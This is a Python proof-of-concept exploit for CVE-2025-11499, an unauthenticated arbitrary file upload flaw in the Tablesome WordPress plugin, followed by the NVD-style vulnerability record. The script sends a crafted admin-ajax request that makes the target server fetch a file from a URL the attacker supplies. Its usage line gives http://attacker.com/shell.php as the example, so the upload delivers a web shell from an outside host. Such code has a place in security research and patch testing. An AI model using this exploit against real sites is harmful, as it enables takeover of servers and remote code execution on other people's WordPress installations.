CVE-2025-11499

import requests import sys # CVE-2025-11499 PoC - Arbitrary File Upload in Tablesome WordPress Plugin # Target: WordPress site with Tablesome plugin <= 1.1.32 def exploit(target_url, attacker_file_url): """ Exploit the arbitrary file upload vulnerability in Tablesome plugin. Args: target_url: Base URL of the vulnerable WordPress site attacker_file_url: URL of the malicious file to upload Note: Requires a workflow trigger to be created and external URL feature enabled """ # Endpoint for setting featured image from external URL endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct the malicious request data = { 'action': 'tablesome_set_featured_image', 'image_url': attacker_file_url, 'post_id': 1 # May vary depending on configuration } try: response = requests.post(endpoint, data=data, timeout=30) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response: {response.text}") # If successful, the malicious file will be uploaded to /wp-content/uploads/ return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-11499.py <target_url> <malicious_file_url>") print("Example: python cve-2025-11499.py http://example.com http://attacker.com/shell.php") sys.exit(1) target = sys.argv[1] malicious_file = sys.argv[2] exploit(target, malicious_file)

{"cve": {"id": "CVE-2025-11499", "sourceIdentifier": "[email protected]", "published": "2025-11-01T07:15:34.940", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_featured_image_from_external_url() function in all versions up to, and including, 1.1.32. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible in configurations where unauthenticated users have been provided with a method for adding featured images, and the workflow trigger is created."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/tablesome/trunk/workflow-library/actions/wp-post-creation.php#L309", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3386484/tablesome/trunk/workflow-library/actions/wp-post-creation.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2be770c7-7aa2-430b-981d-5d81fe068bef?source=cve", "source": "[email protected]"}]}}